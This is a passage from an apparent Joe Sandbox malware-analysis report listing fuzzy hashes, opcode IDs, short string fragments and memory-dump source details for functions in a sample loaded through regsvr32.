                                                                    • Instruction Fuzzy Hash: 5041B0B490038E8FDB48DF65D8895DE7BB0FB48358F104A1AEC25A6250D7B4D664CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: UfMm
                                                                    • API String ID: 0-3877223347
                                                                    • Opcode ID: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                                    • Instruction ID: c77ef5b6f515275834e01b5fcfcfc22ffe1a93dbca634ff8363d49e0f941db2a
                                                                    • Opcode Fuzzy Hash: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                                    • Instruction Fuzzy Hash: A1519EB190474E8BCF49CF64C48A5DE7FB0FB68398F214219E85A96250D3B8D6A4CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^I%
                                                                    • API String ID: 0-4091345571
                                                                    • Opcode ID: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                                    • Instruction ID: 24279a7f0b8a810ed47d94a020ccddcda864278dcc3d62ea9a1aafd37f1cc870
                                                                    • Opcode Fuzzy Hash: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                                    • Instruction Fuzzy Hash: D641C2B090074E8BCB48DF68C58A4DE7FF0FB68398F204219EC16A6250D3B496A4CFD4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: E
                                                                    • API String ID: 0-4189953480
                                                                    • Opcode ID: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                                    • Instruction ID: 97bb68eb89739962e45bd832e2874dcd633b22f5609a7b84b761109d701c7c23
                                                                    • Opcode Fuzzy Hash: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                                    • Instruction Fuzzy Hash: B341D5B491038E8FCF88DF69D8495DE7BB0FB18358F104A19EC2AA6250D3B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JLq
                                                                    • API String ID: 0-4186083495
                                                                    • Opcode ID: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                                    • Instruction ID: 27128c2ca0a5d288d3179379bf0eddb2aee49c7a11679c2610c242e98f2fdc84
                                                                    • Opcode Fuzzy Hash: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                                    • Instruction Fuzzy Hash: 3C41D5B090064E8FDF48CF68C4865EE7BF1FB58358F114229E846AA254C7789A95CFD4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: vYa-
                                                                    • API String ID: 0-893662192
                                                                    • Opcode ID: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                                    • Instruction ID: ed719b7027dd4d7706803f37edca27847d3dc95415a6febebb675a1e15796353
                                                                    • Opcode Fuzzy Hash: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                                    • Instruction Fuzzy Hash: 0741C0B090034E8FCF48CF64D88A5DE7FB0FB68398F104619E856A6250D7B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: < dA
                                                                    • API String ID: 0-2747138368
                                                                    • Opcode ID: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                                    • Instruction ID: 677e9d37894352eedc94dfbe70e1d5a5f16f85bbcaa69aa355918790c22682b0
                                                                    • Opcode Fuzzy Hash: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                                    • Instruction Fuzzy Hash: 2741A0B180074E8FCB49CF64D48A4DE7FB0FB68388F204619E856A6254D7B496A8CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: w.
                                                                    • API String ID: 0-4252102657
                                                                    • Opcode ID: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                                    • Instruction ID: 9835b62cc5c81bb08ffa4c0ed138b56601e81b85f9b16a4ced47218125f66503
                                                                    • Opcode Fuzzy Hash: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                                    • Instruction Fuzzy Hash: FC41E4B090434A8BCF48DF64C88A4DE7FB1FB58348F11861DEC5AA6250D7B496A9CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: }]T*
                                                                    • API String ID: 0-3642313528
                                                                    • Opcode ID: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                                    • Instruction ID: a9b4d124700f7192ec0ffbe58db6f2cedd89af67995077d1789eaf9c0a4fefb8
                                                                    • Opcode Fuzzy Hash: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                                    • Instruction Fuzzy Hash: 624191B191074E9FCF48DF64D48A4DE7FB0FB68388F214619E816A6210D3B496A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: w.
                                                                    • API String ID: 0-4252102657
                                                                    • Opcode ID: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                                    • Instruction ID: 13a44cd4838b071505596f301d9460f32b91f3f909068c68e30d7ec81fe075ae
                                                                    • Opcode Fuzzy Hash: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                                    • Instruction Fuzzy Hash: 194104B090434A8BCF48CF64C88A4DE7FB1FB58348F10861DEC5AA6250D7B496A8CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N8$
                                                                    • API String ID: 0-2933465586
                                                                    • Opcode ID: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                                    • Instruction ID: 297b3d980fd839d27da657b87e2df8633a1b9c783a0b67fb1012bddc2283f9fe
                                                                    • Opcode Fuzzy Hash: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                                    • Instruction Fuzzy Hash: 0241827180078E8FCB45CF64D88A4CE7FB0FB18358F105A19F865A7260D3B49664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wk
                                                                    • API String ID: 0-1447520534
                                                                    • Opcode ID: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                                    • Instruction ID: ed1e7f9bc21f483ed76e74f249cc539d96e15df8e9c5d2752f3a18cd8a4680c8
                                                                    • Opcode Fuzzy Hash: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                                    • Instruction Fuzzy Hash: A041C4B180074E8BCB48DF68D48A4CE7FF0FB68398F10461DE859A6250D7B49AA4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D7
                                                                    • API String ID: 0-599489778
                                                                    • Opcode ID: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                                    • Instruction ID: 9ff7da26f915c3fd9b9081bc776a27ba1207aebd425a4d5bef8b93ab939ca450
                                                                    • Opcode Fuzzy Hash: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                                    • Instruction Fuzzy Hash: 4541B0B090074E8BCF48DF68D4965DE7FB0FB68388F20421DE816A6250D7B496A5CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -
                                                                    • API String ID: 0-2547686586
                                                                    • Opcode ID: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                                    • Instruction ID: fb4667ec304b728e9739446c3b2210f9efd75ae712771165d94948b9d3b69a1a
                                                                    • Opcode Fuzzy Hash: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                                    • Instruction Fuzzy Hash: E641D2B181038ECFCB48CFA4D88A5CE7BB1FB48358F115A09FC65A6224D3B49665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Q
                                                                    • API String ID: 0-2885194100
                                                                    • Opcode ID: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                                    • Instruction ID: a9705b719f6d6278401c973a571993bf085652b79919a3d293b183e1acac7421
                                                                    • Opcode Fuzzy Hash: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                                    • Instruction Fuzzy Hash: 9141F5B180434E8FCF48CFA4C84A4DE7FB1FB18318F004619EC5AA6250D7B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: UA;k
                                                                    • API String ID: 0-1243451539
                                                                    • Opcode ID: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                                    • Instruction ID: 446a4ee04f98266578c7fdeec7750357e9914a8a062f983f2ae732e753f3f9f0
                                                                    • Opcode Fuzzy Hash: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                                    • Instruction Fuzzy Hash: AC31E2B090034E8FCB48DF65C48A4DE7FB0FB68398F104619E859A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BHj
                                                                    • API String ID: 0-429444599
                                                                    • Opcode ID: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                                    • Instruction ID: 88d82d5a62f7e83910e755dc00f06a4804c179e3d48da98a41081325a3075538
                                                                    • Opcode Fuzzy Hash: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                                    • Instruction Fuzzy Hash: 2F31B2B190078E8FCF84DF64C88A5DE7BB0FB58358F010A09E869A6250D7B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: h
                                                                    • API String ID: 0-130632579
                                                                    • Opcode ID: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                                    • Instruction ID: cf3c4ac770fe2f70a1efbbc55b0bf253fcb3f834dda7a796d3e0b8f6df5914ba
                                                                    • Opcode Fuzzy Hash: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                                    • Instruction Fuzzy Hash: 803102705187C48BD789CFA8C48965EFBE1FB94384F50492DF486867A0C7F8D948CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ?%4
                                                                    • API String ID: 0-422666221
                                                                    • Opcode ID: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                                    • Instruction ID: a7a624d76b7a6b6a49308da5d267df16e75217d08dbc55e4173753466c7a619f
                                                                    • Opcode Fuzzy Hash: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                                    • Instruction Fuzzy Hash: 0721A470628780AB878CDF28D49981BBBE1FBC9304F906A1CF9C68B364D7749445CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ve
                                                                    • API String ID: 0-2619166483
                                                                    • Opcode ID: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                                    • Instruction ID: bd1518f744f48cc188204749d08526443734dde3f23549b257c943e1dafbc1e4
                                                                    • Opcode Fuzzy Hash: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                                    • Instruction Fuzzy Hash: 3B217BB16187858BC748DF28C55951ABBE1FBCC318F404B5DF8CAAA360D378D645CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hk
                                                                    • API String ID: 0-2736353058
                                                                    • Opcode ID: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                                    • Instruction ID: 887fdeaeec6620913bccc1519bb94b7ab545cc472d3a2f82c737665b3ebe67cb
                                                                    • Opcode Fuzzy Hash: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                                    • Instruction Fuzzy Hash: 20319CB4628384AB8388DF28C49981ABBF1FBC9304F806A1DF8868A260D775D445CB03
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @Bp!
                                                                    • API String ID: 0-2853746471
                                                                    • Opcode ID: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                                    • Instruction ID: a42def5e4906ba5408d95fb28ee36c9633a666dd8c6a1d0dabe2f17b10b73553
                                                                    • Opcode Fuzzy Hash: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                                    • Instruction Fuzzy Hash: 8831F37080034E8BCB44DF64D48A4DE7FB0FB28398F11461AE869A6210D3B48694CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _&%
                                                                    • API String ID: 0-276555772
                                                                    • Opcode ID: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                                    • Instruction ID: 84b034befa84842a6d26d9f5413634863003efd6eec9a48b68f2958c9e87747a
                                                                    • Opcode Fuzzy Hash: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                                    • Instruction Fuzzy Hash: C3217BB06187848B8748DF28D45A51ABBE1FBCC308F404B5DF4CAAA360D3789609CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V
                                                                    • API String ID: 0-2990084971
                                                                    • Opcode ID: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                                    • Instruction ID: 19a784c3393b647e1d02845cf9d1e0035701b9012461bc7b4b972f754d4b287b
                                                                    • Opcode Fuzzy Hash: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                                    • Instruction Fuzzy Hash: E021ADB4529780AFD788DF28D09981FBBF0FB89304F806A1CF9868B360E3759445CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fe_
                                                                    • API String ID: 0-1346747655
                                                                    • Opcode ID: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                                    • Instruction ID: 9f8913945123cb4278df7be958afc5fc5d749fa594805d3e5c5ffa2821aade6f
                                                                    • Opcode Fuzzy Hash: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                                    • Instruction Fuzzy Hash: 25215DB55183818B9348EF28D44A51BBBE1BB8D34CF404B5DF4CEAA260D778D615CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                                    • Instruction ID: f4bbdddc4ebc6fe898ddfb3184844cd7ab88b5746f894e32bccfd4327ba112cf
                                                                    • Opcode Fuzzy Hash: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                                    • Instruction Fuzzy Hash: F751247152078DABDBC9DF28C8CAA9C3BA1FB44754F806219FC468A261D774D5C9CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                                    • Instruction ID: d7e3191637b78f1be9ff87ab698ad538cd7d2d45c46478ba59590cd585685a95
                                                                    • Opcode Fuzzy Hash: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                                    • Instruction Fuzzy Hash: 5761B1B490078E8FCF48DF68D8595DE7BB0FB48318F014A19FC6696250D7B49A25CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                                    • Instruction ID: f17689cc06c9532d3252f7dc5abd3373f404a3f8166a5e21e79f0a6996b359c5
                                                                    • Opcode Fuzzy Hash: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                                    • Instruction Fuzzy Hash: 0B41B870608B488FC768DF19D08976ABBF1FB89711F40856EE68AC7351DB319848CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                                    • Instruction ID: 9422144e28ecc4a9930a11d21f18f8515329dd70f686b1b52883d16e1825d5f7
                                                                    • Opcode Fuzzy Hash: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                                    • Instruction Fuzzy Hash: 2A414D34509B588FD768DF28918A75ABBE0FF99310F004A5EE58EC7362D770D949CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                                    • Instruction ID: bbd244a3cf3555809e115011e05a98a3e8d5fd40b217627e69400f11bfb30a94
                                                                    • Opcode Fuzzy Hash: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                                    • Instruction Fuzzy Hash: 745193B590434ACFCF48CF64D48A5CE7FB0FB68398F214219E856A6250D3B496A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                                    • Instruction ID: 8b5374169f69602128bd3032aff790cb1f354843cf4962b6e845d1f3af7287dc
                                                                    • Opcode Fuzzy Hash: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                                    • Instruction Fuzzy Hash: 9741A0B180078E8BCB44CFA8D84A5DE7BF0FB18358F104A19F865A6250D3B89668CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
